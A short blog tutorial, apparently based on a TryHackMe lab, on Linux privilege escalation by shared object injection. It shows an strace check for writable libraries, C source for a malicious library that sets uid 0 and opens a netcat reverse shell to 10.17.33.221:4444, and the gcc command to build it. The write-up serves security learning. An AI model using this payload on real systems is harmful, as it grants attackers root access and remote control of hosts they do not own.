Recently, I was solving the TryHackMe Linux Privilege Escalation Lab, there the task 12 required me to do a shared object injection in order to gain higher privileges. But, at that time, I felt there aren’t a lot of helpful resources online in order for me to understand the concepts behind it. So, here is a shared object injection tutorial for beginners.
What are Shared Objects?
A shared library or shared object is a computer file that contains executable code designed to be used by multiple computer programs or other libraries at runtime. — Wikipedia
These files, are generally located under a lib folder in linux. For example — /lib, /usr/lib, etc. These files are generally with an extension “.so” for dynamically linked shared library objects.
A program loads these libraries in order to use their code, and thus promote code reuse. These libraries are generally predefined. For example: libc.so.
The term “libc” is commonly used as a shorthand for the “standard C library” a library of standard functions that can be used by all C programs. — Linux Manual
When a program tries to load a library, on which we have write access, we can change the code of the library to some malicious code, in order to run our malicious code with the host program while in runtime. This is particularly useful, if the host program is running with higher privileges (crontab, suid, etc), then the malicious library can act as a privilege escalation vector.
Checking For An Interesting Shared Library Object
strace /path/to/file 2>&1 | grep -iE 'open|access|no such file'Here if you find any library on which you have write access, then you can craft a malicious library which will get run with the privileges of the host program. The code is as follows:
#include <stdio.h>
#include <stdlib.h>
static void func() __attribute__ ((constructor));
static void func() {
setuid(0); // 0 uid is for root
system("nc -e /bin/bash 10.17.33.221 4444");
}Here, if netcat is not present in the system, transfer ncat.
Compilation
gcc -shared -fPIC -Wall -o /desired/path/to/library.so library.cNow when running the program, this malicious library shall run with higher privileges, and provide you with a reverse shell.
